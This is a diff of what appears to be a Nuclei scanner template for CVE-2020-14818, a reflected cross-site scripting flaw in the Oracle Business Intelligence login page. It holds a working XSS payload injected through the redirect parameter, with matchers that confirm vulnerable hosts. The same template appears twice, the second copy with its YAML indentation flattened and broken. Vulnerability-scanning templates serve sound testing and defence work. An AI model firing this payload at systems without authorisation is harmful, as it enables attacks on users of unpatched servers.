rootsploit · December 18, 2023 06:50
diff --git a/CVE-2020-14818.yaml b/CVE-2020-14818.yaml
 id: cve-2020-14818

 info:
  name: Oracle BI - XSS by @HackerOn2Wheels
  author: RootSploit
  severity: medium
  description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence

 requests:
  - method: GET
    path:
      - '{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(1337)>'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "bitechLogin.setup"
        part: body
	id: cve-2020-14818

	info:
	name: Oracle BI - XSS by @HackerOn2Wheels
	author: RootSploit
	severity: medium
	description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence

	requests:
	- method: GET
	path:
	- '{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(1337)>'
	matchers-condition: and
	matchers:
	- type: status
	status:
	- 200
	- type: word
	words:
	- "bitechLogin.setup"
	part: body